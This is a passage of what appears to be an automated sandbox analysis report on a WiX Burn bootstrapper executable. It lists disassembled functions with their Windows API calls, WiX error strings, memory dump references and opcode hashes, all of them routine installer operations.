                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1797994465.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798087787.000000000094E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798131990.000000000097C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798163345.000000000097E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798163345.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_8e0000_kXzODlqJak.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: String$AllocFree
                                                                                                                                                                                                                                                                            • String ID: d:\a\wix4\wix4\src\libs\dutil\wixtoolset.dutil\xmlutil.cpp$failed SysAllocString
                                                                                                                                                                                                                                                                            • API String ID: 344208780-608482133
                                                                                                                                                                                                                                                                            • Opcode ID: ce7904db6743ba8b534c8081c4d9eaf5bd76c0cea53979da1a0fba757b78927c
                                                                                                                                                                                                                                                                            • Instruction ID: 47068ef56f88c2893495abe9d4b6a7ba1f8ec2841b8cd778ceab46551dbb11e7
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: ce7904db6743ba8b534c8081c4d9eaf5bd76c0cea53979da1a0fba757b78927c
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: C001F232641620A7CB325E149C0DFAF37A8BBC2B60F154129FA08AB240D6B59C00EAD1
                                                                                                                                                                                                                                                                            Function 00941185 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 45COMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • CompareStringOrdinal.KERNEL32(00000000,00000009,00000008,0000000D,00000001,00000000,00000001,?,00941359,00000000,000000FF,00000000,000000FF,00000000,00000001,00000014), ref: 0094119A
                                                                                                                                                                                                                                                                            • GetLastError.KERNEL32(?,00941359,00000000,000000FF,00000000,000000FF,00000000,00000001,00000014,00000015,00000010,00000011,0000000C,0000000D,00000008,00000009), ref: 009411A6
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1798031043.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1797994465.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798087787.000000000094E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798131990.000000000097C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798163345.000000000097E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798163345.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_8e0000_kXzODlqJak.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: CompareErrorLastOrdinalString
                                                                                                                                                                                                                                                                            • String ID: Failed to compare version substrings$d:\a\wix4\wix4\src\libs\dutil\wixtoolset.dutil\verutil.cpp
                                                                                                                                                                                                                                                                            • API String ID: 2427233125-1336685116
                                                                                                                                                                                                                                                                            • Opcode ID: e65ffd05971f8727098701acdd766d93206346fc5e521454033ef3ce0c863d53
                                                                                                                                                                                                                                                                            • Instruction ID: 6448983f99fe2d37888efb29eb2424755b53c4ab41d4e04ace24351809faec54
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: e65ffd05971f8727098701acdd766d93206346fc5e521454033ef3ce0c863d53
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 03F0F43758032977DB215B9A9C0AF9B7F5CFF597A0F014001FE08AA291E7B18850C6E0
                                                                                                                                                                                                                                                                            Function 008F05D5 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 45libraryloaderCOMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,BundleExtensionDestroy), ref: 008F0603
                                                                                                                                                                                                                                                                            • FreeLibrary.KERNEL32(00000000), ref: 008F061E
                                                                                                                                                                                                                                                                            • GetLastError.KERNEL32 ref: 008F0628
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1798031043.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1797994465.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798087787.000000000094E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798131990.000000000097C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798163345.000000000097E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798163345.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_8e0000_kXzODlqJak.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: AddressErrorFreeLastLibraryProc
                                                                                                                                                                                                                                                                            • String ID: BundleExtensionDestroy
                                                                                                                                                                                                                                                                            • API String ID: 1144718084-3206861012
                                                                                                                                                                                                                                                                            • Opcode ID: bcc36a0aae9173f43cd789f4d9f37f8f6bb4c8d5baf4018943bf71019e62c18a
                                                                                                                                                                                                                                                                            • Instruction ID: c71860be892af0e326f95855cb2cb5c7fbc565a5cf7c2d9ff5ec772162170d72
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: bcc36a0aae9173f43cd789f4d9f37f8f6bb4c8d5baf4018943bf71019e62c18a
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: C5015A35500309EFDB109F75CC88A6ABBB8FB50309F108929E516E3151E7B4A9A0DF60
                                                                                                                                                                                                                                                                            Function 0094050F Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 45COMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                              • Part of subcall function 009401DE: VariantInit.OLEAUT32(?), ref: 009401F5
                                                                                                                                                                                                                                                                              • Part of subcall function 009401DE: VariantClear.OLEAUT32(?), ref: 00940340
                                                                                                                                                                                                                                                                              • Part of subcall function 009401DE: SysFreeString.OLEAUT32(00000000), ref: 0094034B
                                                                                                                                                                                                                                                                            • CompareStringW.KERNEL32(0000007F,00000000,00000000,000000FF,yes,000000FF,008E7D9B,?,00000000,00000000,?,?,008EBB5B,008E7D9B,Hidden,?), ref: 00940563
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            • d:\a\wix4\wix4\src\libs\dutil\wixtoolset.dutil\xmlutil.cpp, xrefs: 00940544
                                                                                                                                                                                                                                                                            • Failed to get attribute., xrefs: 00940535
                                                                                                                                                                                                                                                                            • yes, xrefs: 00940555
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1798031043.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1797994465.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798087787.000000000094E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798131990.000000000097C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798163345.000000000097E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798163345.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_8e0000_kXzODlqJak.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: StringVariant$ClearCompareFreeInit
                                                                                                                                                                                                                                                                            • String ID: Failed to get attribute.$d:\a\wix4\wix4\src\libs\dutil\wixtoolset.dutil\xmlutil.cpp$yes
                                                                                                                                                                                                                                                                            • API String ID: 2896382772-315762043
                                                                                                                                                                                                                                                                            • Opcode ID: 541fd4984fb669aa5efa9505e914556fbc07d1832f45518a7fb442210023af6d
                                                                                                                                                                                                                                                                            • Instruction ID: e68143d65c5343779570437573bf47e623f938a265a0ba84c9422389494355f2
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 541fd4984fb669aa5efa9505e914556fbc07d1832f45518a7fb442210023af6d
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 58012632A94229BBDF10AAB9CC0BF9E7A68EB51725F108310BA14F71D0C6705B10EA90
                                                                                                                                                                                                                                                                            Function 008E9720 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 45COMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • GetCurrentProcess.KERNEL32(?,00000000), ref: 008E9730
                                                                                                                                                                                                                                                                              • Part of subcall function 0093BCAF: LookupPrivilegeValueW.ADVAPI32(00000000,?,?), ref: 0093BCD0
                                                                                                                                                                                                                                                                              • Part of subcall function 0093BCAF: GetLastError.KERNEL32 ref: 0093BCDA
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            • d:\a\wix4\wix4\src\burn\engine\variable.cpp, xrefs: 008E9757, 008E978C
                                                                                                                                                                                                                                                                            • Failed to set variant value., xrefs: 008E977A
                                                                                                                                                                                                                                                                            • Failed to check if process token has privilege: %ls., xrefs: 008E9745
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1798031043.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1797994465.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798087787.000000000094E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798131990.000000000097C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798163345.000000000097E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798163345.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_8e0000_kXzODlqJak.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: CurrentErrorLastLookupPrivilegeProcessValue
                                                                                                                                                                                                                                                                            • String ID: Failed to check if process token has privilege: %ls.$Failed to set variant value.$d:\a\wix4\wix4\src\burn\engine\variable.cpp
                                                                                                                                                                                                                                                                            • API String ID: 3865200005-2747678004
                                                                                                                                                                                                                                                                            • Opcode ID: b8cd2897d73294255fa005fe55d0402d5181d8a3581224e2c6800dfb8f398cad
                                                                                                                                                                                                                                                                            • Instruction ID: 8794bbd3192a11ddb937c8df695fc4bfbfa239d35820dc9422b81eea590d5a1f
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: b8cd2897d73294255fa005fe55d0402d5181d8a3581224e2c6800dfb8f398cad
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 8EF0A4B2A8021477EB11EA96CC0BFDE3A6CEB46B95F014110FE44EA1C1D6A09E1497E1
                                                                                                                                                                                                                                                                            Function 008E9430 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 43COMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • GetCurrentProcess.KERNEL32(?), ref: 008E943F
                                                                                                                                                                                                                                                                              • Part of subcall function 0093BD94: GetModuleHandleW.KERNEL32(kernel32,IsWow64Process2,?,?,?,?,008E944B,00000000), ref: 0093BDA7
                                                                                                                                                                                                                                                                              • Part of subcall function 0093BD94: GetProcAddress.KERNEL32(00000000), ref: 0093BDAE
                                                                                                                                                                                                                                                                              • Part of subcall function 0093BD94: GetLastError.KERNEL32(?,?,?,?,008E944B,00000000), ref: 0093BDD8
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            • d:\a\wix4\wix4\src\burn\engine\variable.cpp, xrefs: 008E9491
                                                                                                                                                                                                                                                                            • Failed to set variant value., xrefs: 008E947F
                                                                                                                                                                                                                                                                            • Failed to get native machine value., xrefs: 008E9451
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1798031043.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1797994465.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798087787.000000000094E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798131990.000000000097C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798163345.000000000097E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798163345.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_8e0000_kXzODlqJak.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: AddressCurrentErrorHandleLastModuleProcProcess
                                                                                                                                                                                                                                                                            • String ID: Failed to get native machine value.$Failed to set variant value.$d:\a\wix4\wix4\src\burn\engine\variable.cpp
                                                                                                                                                                                                                                                                            • API String ID: 896058289-3337725491
                                                                                                                                                                                                                                                                            • Opcode ID: d1f52d5b7a751d978c614106aee0ca67698c58170cc06468973944425b323a35
                                                                                                                                                                                                                                                                            • Instruction ID: 0f0c642d99481c08755dd7061be412b879116697eda7add3c20d755da8bdd261
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: d1f52d5b7a751d978c614106aee0ca67698c58170cc06468973944425b323a35
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 59F0F6B2F8026572DA21E6968C0AFDF355CDB42B59F014111FA84FA1C0E6E0DD008795
                                                                                                                                                                                                                                                                            Function 008E71A8 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 41windowCOMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                              • Part of subcall function 008F05D5: GetProcAddress.KERNEL32(00000000,BundleExtensionDestroy), ref: 008F0603
                                                                                                                                                                                                                                                                              • Part of subcall function 008F05D5: FreeLibrary.KERNEL32(00000000), ref: 008F061E
                                                                                                                                                                                                                                                                              • Part of subcall function 008F05D5: GetLastError.KERNEL32 ref: 008F0628
                                                                                                                                                                                                                                                                            • IsWindow.USER32(?), ref: 008E7385
                                                                                                                                                                                                                                                                            • PostMessageW.USER32(?,00000010,00000000,00000000), ref: 008E7398
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            • d:\a\wix4\wix4\src\burn\engine\engine.cpp, xrefs: 008E7131
                                                                                                                                                                                                                                                                            • Failed to create the message window., xrefs: 008E71A8
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1798031043.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1797994465.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798087787.000000000094E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798131990.000000000097C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798163345.000000000097E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798163345.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_8e0000_kXzODlqJak.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: AddressErrorFreeLastLibraryMessagePostProcWindow
                                                                                                                                                                                                                                                                            • String ID: Failed to create the message window.$d:\a\wix4\wix4\src\burn\engine\engine.cpp
                                                                                                                                                                                                                                                                            • API String ID: 1565363025-1122250624
                                                                                                                                                                                                                                                                            • Opcode ID: a092263edce0c3b897b8724ac8853618fc5ff87ce0e0a890b78cb316f40ac3d4
                                                                                                                                                                                                                                                                            • Instruction ID: 936035e3a8f5abd111ca374760b11f82b9ced5fecb0aa2e32f521e6c8aa0c531
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: a092263edce0c3b897b8724ac8853618fc5ff87ce0e0a890b78cb316f40ac3d4
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: C4F0C871704644BADB11B7AADC4EFAEB668FF52701F500011B901F11A1D7709E90FB51
                                                                                                                                                                                                                                                                            Function 008E71CB Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 41windowCOMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                              • Part of subcall function 008F05D5: GetProcAddress.KERNEL32(00000000,BundleExtensionDestroy), ref: 008F0603
                                                                                                                                                                                                                                                                              • Part of subcall function 008F05D5: FreeLibrary.KERNEL32(00000000), ref: 008F061E
                                                                                                                                                                                                                                                                              • Part of subcall function 008F05D5: GetLastError.KERNEL32 ref: 008F0628
                                                                                                                                                                                                                                                                            • IsWindow.USER32(?), ref: 008E7385
                                                                                                                                                                                                                                                                            • PostMessageW.USER32(?,00000010,00000000,00000000), ref: 008E7398
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            • d:\a\wix4\wix4\src\burn\engine\engine.cpp, xrefs: 008E7131
                                                                                                                                                                                                                                                                            • Failed to query registration., xrefs: 008E71CB
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1798031043.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1797994465.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798087787.000000000094E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798131990.000000000097C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798163345.000000000097E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798163345.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_8e0000_kXzODlqJak.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: AddressErrorFreeLastLibraryMessagePostProcWindow
                                                                                                                                                                                                                                                                            • String ID: Failed to query registration.$d:\a\wix4\wix4\src\burn\engine\engine.cpp
                                                                                                                                                                                                                                                                            • API String ID: 1565363025-1827799990
                                                                                                                                                                                                                                                                            • Opcode ID: 2515ef4982ee2c800257ce835cce46e702973603eee5007427d8650b8d4334d9
                                                                                                                                                                                                                                                                            • Instruction ID: fd633a2b6422565c43139903c144ec9c437ad036bd4b7e5baaddf83444465555
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 2515ef4982ee2c800257ce835cce46e702973603eee5007427d8650b8d4334d9
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 7CF0C871604644BADB01F7AACC4EFAEB668FF52701F500011B901E11A1D7708E94FB51
                                                                                                                                                                                                                                                                            Function 008E716A Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 41windowCOMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                              • Part of subcall function 008F05D5: GetProcAddress.KERNEL32(00000000,BundleExtensionDestroy), ref: 008F0603
                                                                                                                                                                                                                                                                              • Part of subcall function 008F05D5: FreeLibrary.KERNEL32(00000000), ref: 008F061E
                                                                                                                                                                                                                                                                              • Part of subcall function 008F05D5: GetLastError.KERNEL32 ref: 008F0628
                                                                                                                                                                                                                                                                            • IsWindow.USER32(?), ref: 008E7385
                                                                                                                                                                                                                                                                            • PostMessageW.USER32(?,00000010,00000000,00000000), ref: 008E7398
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            • d:\a\wix4\wix4\src\burn\engine\engine.cpp, xrefs: 008E7131
                                                                                                                                                                                                                                                                            • Failed to check global conditions, xrefs: 008E716A
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1798031043.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1797994465.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798087787.000000000094E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798131990.000000000097C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798163345.000000000097E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798163345.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_8e0000_kXzODlqJak.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: AddressErrorFreeLastLibraryMessagePostProcWindow
                                                                                                                                                                                                                                                                            • String ID: Failed to check global conditions$d:\a\wix4\wix4\src\burn\engine\engine.cpp
                                                                                                                                                                                                                                                                            • API String ID: 1565363025-665746148
                                                                                                                                                                                                                                                                            • Opcode ID: f862de1e120ebe61203fe9a3bda4d129ed968f1c8be21fb1c4bc3fefca4c43e6
                                                                                                                                                                                                                                                                            • Instruction ID: 0206a1ab96921186f25005d98f0774f217823da106f97d253d4a28e781418235
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: f862de1e120ebe61203fe9a3bda4d129ed968f1c8be21fb1c4bc3fefca4c43e6
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: D6F06871604644BADB11B7AACC4EFAEBA68FF52705F500011B901E51A2D771DE90FB51
                                                                                                                                                                                                                                                                            Function 008E711F Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 40windowCOMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                              • Part of subcall function 008F05D5: GetProcAddress.KERNEL32(00000000,BundleExtensionDestroy), ref: 008F0603
                                                                                                                                                                                                                                                                              • Part of subcall function 008F05D5: FreeLibrary.KERNEL32(00000000), ref: 008F061E
                                                                                                                                                                                                                                                                              • Part of subcall function 008F05D5: GetLastError.KERNEL32 ref: 008F0628
                                                                                                                                                                                                                                                                            • IsWindow.USER32(?), ref: 008E7385
                                                                                                                                                                                                                                                                            • PostMessageW.USER32(?,00000010,00000000,00000000), ref: 008E7398
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            • d:\a\wix4\wix4\src\burn\engine\engine.cpp, xrefs: 008E7131
                                                                                                                                                                                                                                                                            • Failed to open log., xrefs: 008E711F
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1798031043.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1797994465.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798087787.000000000094E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798131990.000000000097C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798163345.000000000097E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798163345.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_8e0000_kXzODlqJak.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: AddressErrorFreeLastLibraryMessagePostProcWindow
                                                                                                                                                                                                                                                                            • String ID: Failed to open log.$d:\a\wix4\wix4\src\burn\engine\engine.cpp
                                                                                                                                                                                                                                                                            • API String ID: 1565363025-1747915094
                                                                                                                                                                                                                                                                            • Opcode ID: 6fea6d0b0cc3f3b8ddd347077e8f0ff5fe0667cbf8e43b8dbc10851b9a627bdd
                                                                                                                                                                                                                                                                            • Instruction ID: 5d12fe4252b398a5d203f743db53e8ed1f8ba4c90276f69cecfaa1575efcdb4e
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 6fea6d0b0cc3f3b8ddd347077e8f0ff5fe0667cbf8e43b8dbc10851b9a627bdd
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: D3F0FC71604144BADB01F7AACC0EFAEB678FF12701F500011B901F11A1D7709E90FB51
                                                                                                                                                                                                                                                                            Function 00929AE3 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 27libraryCOMMONLIBRARYCODE
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • LoadLibraryExW.KERNEL32(00000011,00000000,00000800,?,00929A94,00000000,00000001,0097CD30,?,?,?,00929C37,00000004,InitializeCriticalSectionEx,0096C2FC,InitializeCriticalSectionEx), ref: 00929AF0
                                                                                                                                                                                                                                                                            • GetLastError.KERNEL32(?,00929A94,00000000,00000001,0097CD30,?,?,?,00929C37,00000004,InitializeCriticalSectionEx,0096C2FC,InitializeCriticalSectionEx,00000000,?,009299B0), ref: 00929AFA
                                                                                                                                                                                                                                                                            • LoadLibraryExW.KERNEL32(00000011,00000000,00000000,?,00000011,009294B3), ref: 00929B22
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1798031043.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1797994465.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798087787.000000000094E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798131990.000000000097C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798163345.000000000097E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798163345.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_8e0000_kXzODlqJak.jbxd
                                                                                                                                                                                                                                                                            Similarity
